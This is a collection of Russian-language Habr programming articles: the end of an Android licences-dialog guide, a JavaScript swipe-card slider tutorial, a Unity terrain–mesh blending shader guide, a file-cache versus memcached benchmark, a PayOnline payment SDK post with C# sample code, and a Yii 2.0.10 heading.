return new LicensesDialogFragment();
}
@NonNull
@Override
public Dialog onCreateDialog(Bundle savedInstanceState) {
WebView view = (WebView) LayoutInflater.from(getActivity()).inflate(R.layout.dialog_license, null);
view.loadUrl("file:///android_asset/open_source_licenses.html");
return new AlertDialog.Builder(getActivity(), R.style.Theme_AppCompat_Light_Dialog_Alert)
.setTitle(getString(R.string.action_licenses))
.setView(view)
.setPositiveButton(android.R.string.ok, null)
.create();
}
```
4.
В strings.xml помещаем строку, в которой укажем заголовок для нашего диалога:
```
Лицензии открытого ПО
```
5.
В MainActivity.java или в вашем активити, где находится Navigation Drawer, пишем следующий метод:
```
private void displayLicensesDialogFragment() {
LicensesDialogFragment dialog = LicensesDialogFragment.newInstance();
dialog.show(getFragmentManager(), "LicensesDialog");
}
```
6.
Теперь, вызываем этот метод где нам хочется. Я его поставил на onNavigationItemSelected:
```
displayLicensesDialogFragment();
```
Не забудьте создать соответствующий item в main.xml или activity\_main\_drawer.xml в зависимости, куда вы хотите поместить ваш метод.
Вот, что получилось у меня:

P.S. Да, сам html-код можно и нужно немного подмарафетить, чтобы он не расползался, но это дела уже лично каждого, я в этой статье хотел показать, как работать с лицензиями библиотек. | https://habr.com/ru/post/274859/ | null | ru | null |
# Пишем сложный, но интересный слайдер на JavaScript

Доброго времени суток, друзья! Решил вернуться к теме слайдеров. Вдохновением послужила [эта статья](https://www.hackdoor.io/articles/8MNPqDpV/build-a-full-featured-tinder-like-carousel-in-vanilla-javascript). Статья про генератор галереи изображений со встроенным слайдером находится [здесь](https://habr.com/ru/post/486572/).
Слайдер, который мы напишем, работает по принципу бесконечной карточной колоды или стопки изображений. Верхнее изображение отбрасывается в одно из трех направлений — влево, вправо или вверх. Отброшенное изображение заменяется следующим, и так до бесконечности. Имеется возможность загружать свои изображения или использовать изображения по умолчанию.
Для регистрации жестов (касаний) и перемещения (перетаскивания) используется [hammer.js](https://hammerjs.github.io/). Данная библиотека позволяет обнаруживать как клики мышью, так и касания пальцем.
Итак, поехали.
Разметка выглядит так:
```
build carousel
```
У нас имеется «инпут» для загрузки изображений, кнопка для создания карусели и контейнер для карточек.
Добавим немного стилей:
```
body {
margin: 0;
overflow: hidden;
}
div {
width: 100%;
height: 100vh;
position: relative;
}
img {
width: 320px;
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%) scale(0.95);
box-shadow: 0px 4px 4px 0px rgba(0, 0, 0, 0.1);
}
```
Здесь ничего особенного: изображения имеют ширину 320px, располагаются по центру одно поверх другого.
Переходим к JS. Приведу код целиком. Пусть вас не пугает количество строчек, все довольно просто, кроме, разве что, вычисления позиций и координат. Почти каждая строчка снабжена комментарием.
```
let button = document.querySelector('button')
let input = document.querySelector('input')
let files
let i = 0
button.addEventListener('click', () => {
// получаем количество файлов
files = input.files
document.body.removeChild(input)
document.body.removeChild(button)
let board = document.querySelector('div')
// создаем карусель
let carousel = new Carousel(board)
})
class Carousel {
constructor(element) {
this.board = element
// добавляем первые две карточки вручную
this.push()
// увеличиваем счетчик
i++
this.push()
// обрабатываем жесты
this.handle()
}
handle() {
// получаем список всех карточек
this.cards = this.board.querySelectorAll('img')
// получаем верхнюю карточку
this.topCard = this.cards[this.cards.length - 1]
// получаем следующую карточку
this.nextCard = this.cards[this.cards.length - 2]
// если имеется хотя бы одна карточка
if (this.cards.length > 0) {
// определяем позицию и масштаб верхней карточки
this.topCard.style.transform =
'translate(-50%, -50%) rotate(0deg) scale(1)'
// слушаем жесты (касания) и перемещение (перетаскивание) на верхней карточке
this.hammer = new Hammer(this.topCard)
this.hammer.add(new Hammer.Tap())
this.hammer.add(new Hammer.Pan({
position: Hammer.position_ALL,
threshold: 0
}))
// передаем данные о событии в функции обратного вызова
this.hammer.on('tap', (e) => {
this.onTap(e)
})
this.hammer.on('pan', (e) => {
this.onPan(e)
})
}
}
// жест (касание)
onTap(e) {
// получаем позицию курсора на верхней карточке
let propX = (e.center.x - e.target.getBoundingClientRect().left) / e.target.clientWidth
// получаем угол поворота по оси Y (+/-15 градусов)
let rotateY = 15 * (propX < 0.05 ? -1 : 1)
// меняем значение свойства transition
this.topCard.style.transition = 'transform 100ms ease-out'
// поворачиваем
this.topCard.style.transform =
'translate(-50%, -50%) rotateX(0deg) rotateY(' + rotateY + 'deg) scale(1)'
// ждем окончания перехода
setTimeout(() => {
// сбрасываем значение свойства transform
this.topCard.style.transform =
'translate(-50%, -50%) rotate(0deg) scale(1)'
}, 100)
}
// перемещение (перетаскивание)
onPan(e) {
if (!this.isPanning) {
this.isPanning = true
// удаляем значения свойства transition
this.topCard.style.transition = null
if (this.nextCard) this.nextCard.style.transition = null
// получаем координаты верхней карточки в пикселях
let style = window.getComputedStyle(this.topCard)
let mx = style.transform.match(/^matrix\((.+)\)$/)
this.startPosX = mx ? parseFloat(mx[1].split(', ')[4]) : 0
this.startPosY = mx ? parseFloat(mx[1].split(', ')[5]) : 0
// получаем границы верхней карточки
let bounds = this.topCard.getBoundingClientRect()
// получаем позицию курсора на верхней карточке, верх (1) или низ (-1)
this.isDraggingFrom =
(e.center.y - bounds.top) > this.topCard.clientHeight / 2 ? -1 : 1
}
// вычисляем новые координаты
let posX = e.deltaX + this.startPosX
let posY = e.deltaY + this.startPosY
// получаем разницу между смещенными пикселями и осями
let propX = e.deltaX / this.board.clientWidth
let propY = e.deltaY / this.board.clientHeight
// получаем направление перемещения, влево (-1) или вправо (1)
let dirX = e.deltaX < 0 ? -1 : 1
// вычисляем угол поворота, между 0 и +/-45 градусов
let deg = this.isDraggingFrom * dirX * Math.abs(propX) * 45
// вычисляем разницу в масштабе, между 95 и 100%
let scale = (95 + (5 * Math.abs(propX))) / 100
// перемещаем верхнюю карточку
this.topCard.style.transform =
'translateX(' + posX + 'px) translateY(' + posY + 'px) rotate(' + deg + 'deg) scale(1)'
// масштабируем следующую карточку
if (this.nextCard) this.nextCard.style.transform =
'translate(-50%, -50%) rotate(0deg) scale(' + scale + ')'
if (e.isFinal) {
this.isPanning = false
let successful = false
// возвращаем значения свойства transition
this.topCard.style.transition = 'transform 200ms ease-out'
if (this.nextCard) this.nextCard.style.transition = 'transform 100ms linear'
// проверяем границы
if (propX > 0.25 && e.direction == Hammer.DIRECTION_RIGHT) {
successful = true
// получаем позицию правой границы
posX = this.board.clientWidth
} else if (propX < -0.25 && e.direction == Hammer.DIRECTION_LEFT) {
successful = true
// получаем позицию левой границы
posX = -(this.board.clientWidth + this.topCard.clientWidth)
} else if (propY < -0.25 && e.direction == Hammer.DIRECTION_UP) {
successful = true
// получаем позицию верхней границы
posY = -(this.board.clientHeight + this.topCard.clientHeight)
}
if (successful) {
// отбрасываем карточку в выбранном направлении
this.topCard.style.transform =
'translateX(' + posX + 'px) translateY(' + posY + 'px) rotate(' + deg + 'deg)'
// ждем окончания перехода
setTimeout(() => {
// удаляем отброшенную карточку
this.board.removeChild(this.topCard)
// увеличиваем счетчик
i++
// если величина счетчика равняется количеству файлов, сбрасываем счетчик
if (i === files.length) i = 0
// добавляем новую карточку
this.push()
// обрабатываем жесты на новой верхней карточке
this.handle()
}, 200)
} else {
// сбрасываем позиции карточек
this.topCard.style.transform =
'translate(-50%, -50%) rotate(0deg) scale(1)'
if (this.nextCard) this.nextCard.style.transform =
'translate(-50%, -50%) rotate(0deg) scale(0.95)'
}
}
}
// добавляем карточку
push() {
let card = document.createElement('img')
// если файлы не выбраны, загружаем изображения по умолчанию
// если выбраны, загружаем их
if (files.length === 0) {
card.src = 'https://picsum.photos/320/320/?random=' +
Math.round(Math.random() * 1000000) +
')'
} else {
card.src = URL.createObjectURL(files[i])
}
if (this.board.firstChild) {
this.board.insertBefore(card, this.board.firstChild)
} else {
this.board.append(card)
}
}
}
```
→ [Github](https://github.com/harryheman/Tinder-like-Slider-in-Vanilla-JavaScript/blob/master/slider.html)
Благодарю за внимание. | https://habr.com/ru/post/495022/ | null | ru | null |
# Блендинг террейна и меша в Unity
***Всем привет, в июне OTUS вновь запускает курс [«Разработчик игр на Unity»](https://otus.pw/YJ08/). В преддверии старта курса, мы подготовили перевод интересного материала по теме.***

---
Сегодня мы поговорим о том, как делать блендинг меша с террейном (или с другими мешами) в Unity. Это руководство довольно продвинутое, но я постарался разбить его на отдельные этапы. Предполагается, что у вас есть общие навыки работы с Unity и базовое знание С#. Руководство разработано для amplify, но я думаю, что его можно также применить и к Shader Graph. Это мое первое руководство, поэтому надеюсь, что оно получится достаточно понятным. Если вы захотите что-то добавить, дайте знать. Я включил сюда стартовый набор, в котором есть некоторые дополнительные шейдеры для этого проекта, а также базовый комплект для начала работы. Все файлы проекта из сегодняшнего руководства доступны моим патронам за $5, но в ближайшем будущем, они будут доступны всем желающим.
→ [Стартовый набор](https://www.patreon.com/posts/terrain-and-mesh-35592920)
→ [Весь проект](https://www.patreon.com/posts/terrain-mesh-35611199)
> ***Примечание:** Учитывая длину этого руководства, я хочу быть уверен, что вы знаете о преимуществах и недостатках этого шейдера. Сегодня мы поговорим о двух версиях шейдера. Первая позволяет выполнять блендинг одной текстуры, поэтому шейдер подходит для текстур с высоким разрешением, но получается, что вы ограничены всего одной текстурой. Второй шейдер позволяет делать блендинг любого количества текстур террейнов с низким разрешением или одного цвета (или мешей текстур террейнов с некоторыми модификациями) и работает на террейнах unity и на мешах террейнов. У этих шейдеров нет нормального полнофункционального блендинга, что возможно пригодилось бы в нестилизованных играх, однако есть способ реализовать его самостоятельно.*
Итак, начнем. Для начала я выделю проблему и углублюсь в теорию, на которой будет основано решение. Чтобы сделать блендинг между террейном и другими мешами нужно как-то сказать шейдеру, где происходит пересечение с террейном. Сказать легче, чем сделать, но способ есть. И в чем же он заключается? Нам поможет *Render Texture*!
### Что такое Render Texture?
*Render Texture* – это, по сути, позиция камеры, которая сохранена в asset-файле. *Render Texture* в играх чаще всего используется для таких вещей, как создание экранов видеонаблюдения. Мы можем использовать *Render Texture* для сохранения вида с камеры в редакторе, чтобы затем эту текстуру можно было использовать как шейдер. Полезно это, потому что мы можем запекать информацию о нашем террейне, такую как высота, нормали и цвета, в текстуру, которую затем можно использовать в рантайме для блендинга между мешами и террейном.

*Рендеринг текстур используется для вывода изображения гуся на телевизоры в Untitled Goose Game*
### Настройка
Для начала давайте создадим новую сцену и террейн. Установим какой-нибудь удобный для работы размер, например, 200x200. Теперь вы можете обустроить террейн, как вам захочется. Затем создайте [новый слой](https://docs.unity3d.com/Manual/Layers.html) и назовите его “Terrain” и присвойте террейн этому слою. Это нужно, чтобы маска камеры могла записывать террейн в *Render Texture*.

*Мой шедевральный террейн*
В исходных файлах проекта есть префаб, который называется *“BlendBakingCamera”* – перетащите его на сцену. Вы получите простую ортографическую камеру. На камере вам нужно поставить *culling mask* на новый слой террейна. Расположите камеру по центру террейна немного выше самой высокой точки на террейне. Затем отрегулируйте *far clip plane* так, чтобы камера видела пол террейна. В итоге выглядеть сцена должна примерно так:

### Replacement Shader
Теперь, когда камера настроена, нужно найти способ записывать данные террейна. Для этого нам понадобятся *Replacement Shaders. Replacement Shader* кажется сомнительной перспективой, я и сам долгое время не понимал, как он работает. Но на самом деле все очень просто и эффективно. Использование *Replacement Shader*, по сути, означает визуализацию каждого объекта в поле зрения камеры с помощью одного шейдера, независимо от того, какой шейдер наложен на объекты. В итоге все объекты будут рендериться с помощью выбранного *Replacement Shader*, который на самом деле просто является обычным шейдером.
Шейдер, который нам понадобится для блендинга – это шейдер глубины. Он рендерит глубину сцены и является ключевым компонентом в создании нашего эффекта блендинга, поскольку он записывает значения глубины нашей камеры в текстуру, чтобы позже мы смогли их прочитать. Чтобы узнать больше об этом шейдере и о *Replacement Shader* в целом, рекомендую ознакомиться с [этим руководством от Making Stuff Look Good in Unity](https://youtu.be/Tjl8jP5Nuvc).

*Пример шейдера глубины*
### Начнем запекать
Давайте создадим новый класс и назовем его *“TerrainBlendingBaker”*. Начнем с реализации маски глубины для базового террейна. Позже мы еще вернемся к этому скрипту, чтобы добавить цвета и нормали.
Определим несколько переменных.
```
//Shader that renders object based on distance to camera
public Shader depthShader;
//The render texture which will store the depth of our terrain
public RenderTexture depthTexture;
//The camera this script is attached to
private Camera cam;
```
Теперь давайте создадим новый метод и назовем его *«UpdateBakingCamera»*. В этом методе мы определим данные о камере, которые могут понадобиться шейдеру для рендера блендинга в глобальных переменных.
```
private void UpdateBakingCamera()
{
//if the camera hasn't been assigned then assign it
if (cam == null)
{
cam = GetComponent();
}
//the total width of the bounding box of our cameras view
Shader.SetGlobalFloat("TB\_SCALE", GetComponent().orthographicSize \* 2);
//find the bottom corner of the texture in world scale by subtracting the size of the camera from its x and z position
Shader.SetGlobalFloat("TB\_OFFSET\_X", cam.transform.position.x - cam.orthographicSize);
Shader.SetGlobalFloat("TB\_OFFSET\_Z", cam.transform.position.z - cam.orthographicSize);
//we'll also need the relative y position of the camera, lets get this by subtracting the far clip plane from the camera y position
Shader.SetGlobalFloat("TB\_OFFSET\_Y", cam.transform.position.y - cam.farClipPlane);
//we'll also need the far clip plane itself to know the range of y values in the depth texture
Shader.SetGlobalFloat("TB\_FARCLIP", cam.farClipPlane);
//NOTE: some of the arithmatic here could be moved to the shader but keeping it here makes the shader cleaner so ¯\\_(ツ)\_/¯
}
```
Теперь давайте запечем глубину террейна в текстуру.
```
// The context menu tag allows us to run methods from the inspector (https://docs.unity3d.com/ScriptReference/ContextMenu.html)
[ContextMenu("Bake Depth Texture")]
public void BakeTerrainDepth()
{
//call our update camera method
UpdateBakingCamera();
//Make sure the shader and texture are assigned in the inspector
if (depthShader != null && depthTexture != null)
{
//Set the camera replacment shader to the depth shader that we will assign in the inspector
cam.SetReplacementShader(depthShader, "RenderType");
//set the target render texture of the camera to the depth texture
cam.targetTexture = depthTexture;
//set the render texture we just created as a global shader texture variable
Shader.SetGlobalTexture("TB_DEPTH", depthTexture);
}
else
{
Debug.Log("You need to assign the depth shader and depth texture in the inspector");
}
}
```
Значения станут понятнее, когда мы начнем работать с шейдером. Вот небольшая картинка, которая может пролить немного света:

*Мы собираемся перенести террейн на текстуру глубины, чтобы впоследствии прочитать ее и понять, где делать блендинг*
Теперь у нас есть все, что нужно для создания базового эффекта блендинга в шейдере. На данном этапе скрипт выглядит примерно так: [pastebin.com/xNusLJfh](https://pastebin.com/xNusLJfh)
Хорошо, теперь, когда у нас есть скрипт, мы можем добавить его к baking camera, которую мы добавили ранее. В начальных ассетах есть шейдер, который называется *‘DepthShader’ (Inresin/Shaders/DepthShader)* и *Render Texture*, которая называется *‘DepthTerrainRT’ (Inresin/RenderTextures/DepthTextureRT)*, вам нужно поместить их в соответствующие поля в инспекторе.
После этого просто запустите метод через контекстное меню, чтобы запечь нашу глубину террейна в *Render Texture*.

### Шейдер
Давайте, наконец, создадим шейдер для блендинга. Создайте новый стандартный *amplify shader* и откройте его, назовите *‘TerrainBlending’* или около того.
Теперь нам нужно создать UV для *Render Texture*. Это будет разница между точкой, которая рендерится и позицией *baking camera*, масштабированной относительно общей площади. Три глобальные переменные здесь те, которые мы только что объявили в коде. Также мы задаем *worldY* как локальную переменную, она нам понадобится позже.

Давайте возьмем текстуру глубины, которую мы назначили в качестве глобальной переменной (для этого добавьте *texture sample node*, сделайте его глобальным и назовите *‘TB\_DEPTH’*), если мы поместим выходные данные в поле *debug amplify shader*’a, мы сможем увидеть, что происходит. Создайте плоскость с материалом, к которому будет применен наш новый шейдер.

Итак, в шейдере у нас есть информация о глубине, теперь нужно добавить смещение по y, чтобы получить блендинг.

Этот блок масштабирует положение по y маски *far clip plane*, вычитает это значение из позиции мира по оси у точки, которая рендерится, а затем, наконец, смещает его на к нижней стороне ограничительной рамки камеры (положение камеры по оси y минус *farclip plane*).
Уже что-то! Мы видим, как края плоскости сливаются с террейном.

Хорошо, давайте сделаем блендинг более подконтрольным.

Теперь мы можем контролировать толщину и область блендинга террейна.

Думаю, что мы можем даже добавить немного шума. Давайте воспользуемся *world position*, чтобы сгенерировать шум из текстуры.

Текстуры шума лежат в папке с текстурами в стартовом проекте, их можно назначить в инспекторе или как константу в самом шейдере.
Наконец-то пришло время добавить немного текстур! Для начала давайте используем несколько простых одноцветных текстур, я добавил две текстуры в папку с ассетами текстур. Сделайте текстуру *‘SingleColorGrass’* текстурой террейна. Затем в шейдере нужно создать текстуру террейна и *object texture node*. Мы будем переключаться между ними по красному каналу маски, которую мы только что создали.


**А вот и полный шейдер**

Добавление кастомного освещение *toon* или модели *unlit lighting* обеспечит лучшие результаты работы этого шейдера. Я включил *unlit* шейдер террейна и *unlit* версию шейдера в полный пакет, доступный спонсорам.

*Unlit террейн и меши*
Также я рекомендую добавить трипланарный шейдер террейну и, возможно, другим мешам. Я могу рассмотреть этот вопрос в следующем руководстве.
Что же, мы почти закончили с основной темой сегодняшнего руководства. Я добавил несколько разделов, которые могут помочь с расширением шейдера.
### Расширение шейдера — нормали
Я добавил в файлы обычный шейдер, вы можете использовать его для записи нормалей к поверхности террейна и также использовать блендинг. Для моей игры мне не нужен блендинг нормалей, поэтому я просто немного поэкспериментировал, и похоже, что эксперимент удался, и моя идея хорошо работает для террейна без высокой степени изменения высоты. Я включил шейдер маппинга нормалей в директорию с шейдерами стартового набора. Здесь вы можете увидеть мою базовую реализацию карты нормалей:

Код почти такой же, как и в случае с картой глубины, но на этот раз мы будем использовать карту нормалей в качестве *replacement shader*. Также я добавил набор render texture для записи нормали (здесь может понадобиться дополнительная настройка).
Чтобы нормали работали хорошо, может понадобиться чуть больше усилий связанных с настройкой, также может возникнуть ограничение, связанное с низко находящимися террейнами (но я не проводил достаточно тестов, чтобы утверждать это).
### Расширение шейдера – все цвета
Я не собираюсь глубоко вдаваться в подробности этой темы, поскольку она выходит за рамки того, что требуется для моей игры, но я додумался до этого во время написания этого руководства. Чтобы добавить блендинг множества цветов, мы можем выбрать *unlit* цвета террейна и сохранить их как текстуры. В этом случае мы ограничены достаточно низким разрешением, но этот метод хорошо работает при использовании одноцветных текстур террейна и текстур с низким разрешением, или же при использовании *faint bleed*. С учетом небольших корректировок, они также могут быть применены к мешам террейнов.
Здесь приведен код для многоцветного варианта:
```
[Header("The following settings are only if using the multi-color terrain shader")]
//Shader that renders the unlit terraom of an object
public Shader unlitTerrainShader;
//The render texture which will store the normals of our terrain
public RenderTexture surfaceTexture;
//An unlit terrain material used to capture the texture of our terrain without any lighting
public Material unlitTerrainMaterial;
//The terrain you want to capture the textures of
public Terrain yourTerrain;
[ContextMenu("Bake Surface Texture")]
public void BakeTerrainSurface()
{
UpdateBakingCamera();
//return if there is no terrain assigned
if (yourTerrain == null)
{
Debug.Log("You need to assign a terrain to capture surface texture");
return;
}
StartCoroutine(BakeColors());
}
IEnumerator BakeColors()
{
Material tempTerrainMaterial = yourTerrain.materialTemplate;
yourTerrain.materialTemplate = unlitTerrainMaterial;
yield return 0;
cam.SetReplacementShader(unlitTerrainShader, "RenderType");
cam.targetTexture = surfaceTexture;
Shader.SetGlobalTexture("TB_SURFACE", surfaceTexture);
yield return 0;
cam.targetTexture = null;
yourTerrain.materialTemplate = tempTerrainMaterial;
yield return null;
}
```
Единственное изменение в шейдере заключается в том, что вместо использования предопределенной текстуры мы используем глобально заданную текстуру поверхности террейна, которая будет использовать относительное положение в качестве UV. Дополнительное расширение позволит получить более приятный блендинг текстур.

*Блендинг нескольких текстур
Здесь представлен полный многоцветный граф с шейдером блендинга нормалей:*

### Заключение
Поздравляю вас, если вы дочитали до этого момента! Как я уже говорил, это мое первое руководство, поэтому я буду очень признателен за обратную связь. Если вы хотите поддержать меня в создании игр и руководств, загляните [сюда](https://www.patreon.com/Inresin) или подпишитесь на мой [Twitter](https://twitter.com/inresin).
---
[Узнать подробнее о курсе](https://otus.pw/YJ08/) | https://habr.com/ru/post/504554/ | null | ru | null |
# Когда файлы не хуже, чем memcached
Кеш на файлах не медленней memcached.
Нужда в memcached отпадает, если Вам нужен локальный (не распределённый) кеш размером не более свободной оперативки.
Кешеруем простой массив:
`$array = array();
for ($i = 0; $i < 1000; $i++) {
$array []= sha1($i);
}
echo strlen(serialize($array)); // 53899`
Кеш на файлах я сделал так:
`file_put_contents($file, serialize(array($expire, $array)), LOCK_EX);`И проверка `$expire < time()` при каждом получении.
Считаем время получения данных из кеша (10.000 итераций).
file: 4.05 секунд
memcache: 4.07 секунд
Кто всё ещё думает, что файлы это медленно и их скорость зависит от скорости диска, почитайте о [Page cache](http://en.wikipedia.org/wiki/Page_cache). | https://habr.com/ru/post/43412/ | null | ru | null |
# Прием платежей по банковским картам в приложениях — PayOnline Payment SDK
В конце лета PayOnline совместно с Microsoft анонсировали выход нового продукта — PayOnline Payment SDK, позволяющего разработчикам мобильных приложений интегрировать прием безналичных платежей в приложения Windows Store и Windows Phone. 12 сентября мы выступили на Windows Camp с презентацией Payment SDK, встретились с разработчиками приложений лицом к лицу и рассказали о самых интересных аспектах реализации приема платежей в приложениях. О том, что такое интернет-эквайринг, написано много и в Интернете, и, в частности, на Хабре ([1](http://habrahabr.ru/post/157565/),[2](http://habrahabr.ru/post/30321/)), поэтому повторяться не хочется, перейдем сразу к делу.

Как у любого «взрослого» IPSP (Internet Payment Service Provider) у нас есть свой API, позволяющий проводить платежные операции. Мы передаем разработчикам интерфейс, и из полученного «конструктора» разработчик приложения на своей стороне строит ту часть платежного сервиса, которая будет отвечать за взаимодействие плательщика и банка-эквайера.
Все замечательно и ровно до тех пор, пока разработка касается web-сайтов. Интернет-эквайринг – это прием денег в Интернете, и, соответственно, технологии защиты от мошенничества разработаны с учетом этой специфики.
**Один из способов защиты – это протокол 3-D Secure, предложенный мировой платежной системой VISA и принятый за стандарт другими платежными системами.** Что такое 3-D Secure, знает практически каждый, кто совершал покупки в Интернете (сейчас в России очень незначительная доля банков, эмитирующих карты, не поддерживает этот протокол, и их количество уменьшается в связи с требованиями все тех же МПС).
Чаще всего протокол 3-D Secure в работе выглядит так: вы совершаете оплату на сайте интернет-магазина, вводите данные карты, после этого направляетесь на страницу банка-эмитента, где вводите код, полученный в СМС. После этого ваша оплата успешно завершается.
Название 3-D происходит от 3-Domain (три домена), так как в проверке платежа по данному протоколу участвуют организации на трех доменах: домен эмитента (плательщик и банк-эмитент), домен эквайера (банк, обрабатывающий платеж, и интернет-магазин) и домен взаимодействия (МПС). Так выглядит упрощенная схема проверки платежа по протоколу 3-D Secure:

Плательщик вводит данные карты в интернет-магазине, они достигают банка-эквайрера (1), отправляются в МПС (2), откуда направляются в банк-эмитент (3). О том, какой банк эмитировал карту можно узнать по первым шести цифрам номера карты. Банк-эмитент сообщает, что карта подписана на 3-D Secure, формирует уникальный код, а также ссылку на страницу ввода кода (4). Ссылка возвращается в ТСП или IPSP (5), которые делают редирект в браузере держателя карты на эту страницу (6,7). В этот момент эмитент отправляет держателю карты по другому каналу (например, через СМС) временный пин-код, который он вводит на странице. В случае корректного ввода кода, банк-эмитент сообщает об успешном завершении проверки (8), и средства списываются с карты плательщика (9, 10).
Самая простая форма интеграции приема платежей в мобильных приложениях – это встроенный браузер. Нужно встроить браузер для отображения платежной страницы банка-эквайера или платежного шлюза — и страницу для ввода кода подтверждения проверки 3-D Secure. Но что делать, если вы не хотите нарушать целостность дизайна и интерфейса приложения?
В этом случае на помощь приходит API, о котором мы писали выше. Но при использовании API на плечи разработчика приложения ложится значительный объем работ по интеграции приложения с платежным шлюзом, особенно это касается реализации протокола 3-D Secure (см. врезку).
И тут мы подходим к самому интересному — описанию SDK, который позволяет быстро и безболезненно, и «без особого геморроя» интегрировать в приложение прием платежей по картам.
#### Пример кода
Рассмотрим пример кода для приложения Windows Store. Этого достаточно, чтобы обеспечить прием платежей.
```
private void Pay()
{
var conf = new Configuration
{
MerchantId = 1,
Key = "PrivateKey",
};
var request = new PayRequest
{
Amount = 30m,
Currency = Currency.Rub,
OrderId = "335636462808",
CardExpMonth = 1,
CardExpYear = 2018,
CardCvv = 100,
CardHolderName = "CARD HOLDER",
CardNumber = "4111111111111111",
Email = "cardholder@example.com",
};
var po = new Processing(conf);
po.ThreeDs += po_ThreeDs;
po.Success += po_Success;
po.Decline += po_Decline;
po.Error += po_Error;
po.Pay(request);
}
void po_Error(object sender, Exceptions.PaymentSDKException e)
{
}
void po_Decline(object sender, PayResponse e)
{
}
void po_Success(object sender, PayResponse e)
{
}
void po_ThreeDs(object sender, PayResponse e)
{
((Processing)sender).NavigateToAcsUrl(Browser, e);
}
class Configuration : IConfiguration
{
public int MerchantId { get; set; }
public string Key { get; set; }
}
```
**Что здесь происходит.**
Для проведения платежа необходимо использовать объект Processing, принимающий объект, который должен реализовать интерфейс IConfiguration.
Реализация очень простая, два поля: ваш ID и секретный ключ, который выдается при подключении.
```
class Configuration : IConfiguration
{
public int MerchantId { get; set; }
public string Key { get; set; }
}
```
**Объект Processing предоставляет четыре события:*** Success — возникает в случае успешного проведения платежа.
* Decline — возникает в случае отказа в проведении.
* Error — если в момент проведения платежа возникли какие-то ошибки, например, недоступна сеть.
* ThreeDs — необходимо пройти дополнительную проверку по 3-D Secure.
В последнем случае необходимо показать пользователю страницу банка-эмитента для ввода кода или пароля, и обработать ответ. Можно все сделать вручную, а можно воспользоваться методом NavigateToAcsUrl, принимающим в качестве параметров пользовательский элемент управления — браузер (для каждой платформы он свой) и объект PayResponse.
**Наконец, для вызова метода Pay, ему необходимо передать PayRequest, содержащий следующие поля:*** Amount — сумма платежа.
* Currency — валюта (поддерживаются рубли, американские доллары и евро).
* OrderId — ID заказа, который вы генерируете в своей системе.
* CardExpMonth — месяц окончания действия карты.
* CardExpYear — год окончания действия карты.
* CardCvv — CVC2 / CVV2.
* CardHolderName — имя держателя карты.
* CardNumber — номер карты.
* Email — e-mail плательщика.
#### Про PCI PA-DSS
Подкованный читатель, разумеется, заметит, что в нашем SDK мы оперируем номерами карт, и спросит как же PCI DSS? Да, действительно, приложения, в которых вводятся данные банковских карт в ходе оплаты, формально попадают под действие стандарта PCI DSS, а точнее PCI PA-DSS.
Что такое PCI DSS мы подробно писали [в своем посте](http://habrahabr.ru/post/130652/). PCI PA-DSS это родственный PCI DSS стандарт безопасности платежных приложений (Payment Card Industry Payment Application).
* **Область применения:** приложение, которое хранит, обрабатывает или передает данные о держателях карт.
* **Критерий применимости:** хранение, обработка или передача хотя бы одного номера карты (PAN).
* **Критерий соответствия:** выполнение 100% требований.
* **Способ подтверждения:** проверка безопасности приложения аудиторской организацией.
* **Регулярность подтверждения:** ежегодно.
Как несложно понять из области применения стандарта, если в приложении вводятся данные банковских карт, оно попадает под зону действия стандарта. И задуматься о получении сертификата, казалось бы, должны владельцы приложений, использующих как API, так и SDK.
Однако, стоит отметить, что, во-первых, для мобильных приложений еще просто не существует четких требований (как, например, для интернет-магазинов), а во-вторых, для малых форм бизнеса прохождение сертификации является строго обязательным только формально. Например, все интернет-магазины, предоставляющие клиентам возможность оплатить заказ банковской картой, должны обладать сертификатом PCI DSS Level 4, даже если сама оплата производится на защищенной платежной странице сервис-провайдера. Однако, всем понятно, что интернет-магазин с оборотом по картам в 20 000 рублей в месяц никто не обяжет проходить ежегодную сертификацию — и та же ситуация наблюдается с сертификацией по PA-DSS для мобильных приложений.
##### Про возможность замены платежных данных на платежный идентификатор payID
Требования стандарта распространяется на приложения, в которые вводятся данные банковских карт. Если же в приложении вводятся не платежные данные, а некий идентификатор – приложение перестает обрабатывать данные карт и необходимость в сертификации отпадает.
В начале 2013 года мы запустили проект payID, позволяющий принимать оплаты без ввода платежных данных. Владелец банковской карты создает аккаунт в payID, привязывает к нему банковскую карту и при совершении оплат на сайтах, принимающих платежи через PayOnline, вводит не полные данные карты, а свой идентификатор payID и CVC \ CVV код. Это позволяет снять с интернет-магазина или приложения ответственность за обработку данных банковских карт, а плательщику – обеспечить 100% безопасность данных своей карты и, соответственно, денег на счете.
Если встроить в приложение прием оплат по payID – можно принимать платежи по картам без встроенных платежных форм, прохождения сертификации PA-DSS, страха и упрека.
#### Про будущее Payment SDK
Как мы уже писали выше, SDK под Windows мы запустили в конце этого лета, продукт еще свеж и находится в стадии активного развития. Вообще, сфера приема платежей по картам в мобильных приложениях сама по себе очень молода. Вплоть до того, что стандарты безопасности в ней еще формируются, контролируется она отнюдь не так жестко, как стандартная электронная коммерция.
Но динамика роста популярности мобильного Интернета в России, повальный переход с телефонов на смартфоны, рост количества русскоязычных приложений – все это говорит о перспективности работы в мобильном сегменте электронной коммерции, его потенциале и возможностях монетизации.
##### Посему, мы продолжим развивать Payment SDK, и планируем двигаться в нескольких направлениях:
* **Расширение возможностей для разработчиков:** списка платформ (Android, iOS) и списка поддерживаемых языков программирования – здесь все понятно и без комментариев.
* **Перевод с карты на карту:** у нас есть реализованный сервис перевода с карты на карту, о нем на Хабре уже писали. Мы думаем о реализации возможности интеграции данного сервиса в приложения, работающие по Donation схеме. Владелец приложения сможет избежать необходимости регистрации ИП, создания сайта визитки и заключения договора с платежным шлюзом. Ему потребуется только банковская карта для получения переводов.
* **Удобный прием платежей через payID в приложениях:** почему использовать payID удобно и выгодно понятно из части поста «Про PCI PA-DSS». Это позволяет избежать затрат на сертификацию, снять с себя ответственность за данные карт и привлечь новых покупателей.
Сейчас мы размышляем о том, как безболезненно превратить владельца карты во владельца идентификатора, если он уже находится в вашем приложении.
Тем для размышления много, работы не меньше – будем признательны хабражителям за конструктивную критику, интересные идеи и предложения по развитию PayOnline Payment SDK.
Скачать можно из nuget: <https://www.nuget.org/packages/PayOnline_PaymentSDK/> | https://habr.com/ru/post/195854/ | null | ru | null |
# Yii 2.0.10
